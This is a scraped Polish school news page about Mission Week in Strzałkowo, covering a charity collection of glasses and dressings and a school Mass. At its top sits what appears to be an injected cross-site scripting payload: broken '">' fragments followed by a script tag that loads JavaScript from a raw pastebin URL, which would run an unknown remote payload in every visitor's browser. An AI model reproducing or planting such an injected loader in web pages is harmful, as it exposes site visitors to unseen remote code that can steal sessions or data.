">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

Tydzień Misyjny w Strzałkowie

 

Każda przedostatnia niedziela października jest na całym świecie obchodzona jako Światowy Dzień Misyjny (tzw. Niedziela Misyjna), która w Polsce rozpoczyna Tydzień Misyjny.

Jest to czas, w którym mamy budzić siebie i innych do misyjnego zaangażowania. Tydzień Misyjny jest dobrą okazją aby przyjrzeć się problemom z którymi borykają się nasi rówieśnicy z dalekich krajów. Głód, niedożywienie, brak wody, brak opieki medycznej, utrudniony dostęp do edukacji, problem ubóstwa sieroctwa i ciężkiej pracy dzieci to tylko niektóre z problemów dotykających ludzi w różnych rejonach globu.

Niosąc pomoc naszym rówieśnikom włączyliśmy się do akcji „Okulary na misje”. Zabrane okulary przekazaliśmy fundacji Redemptoris Missio.  Wszystkich uczniów naszej szkoły, zapraszamy do wytrwałości w pomaganiu i do włączenia się w kolejną akcję „Opatrunek na ratunek” Przynosimy opatrunki, gazy, bandaże, plastry by tym swoim skromnym darem wspomóc misyjne placówki medyczne. Każdy najdrobniejszy gest dobroci jest wielką pomocą okazaną tym, którzy na nią czekają.

W tym też czasie pamiętamy o wsparciu modlitewnym misji. Modliliśmy się wspólnie podczas Eucharystii o nowe powołania misyjne. Pod opieką p. Ireny Maćkowiak zatroszczyliśmy się o oprawę liturgiczną. Czytaliśmy czytania mszalne, przygotowaliśmy procesję z darami. Modliliśmy się, by nie zabrakło tych, któtrzy ochoczo pojadą pełnić swoją posługę na misjach, głosząc ewngelię oraz troszcząc się o codzienne potrzeby ludzi
z terenu misji. 

 

Irena Maćkowiak
Strzałkowo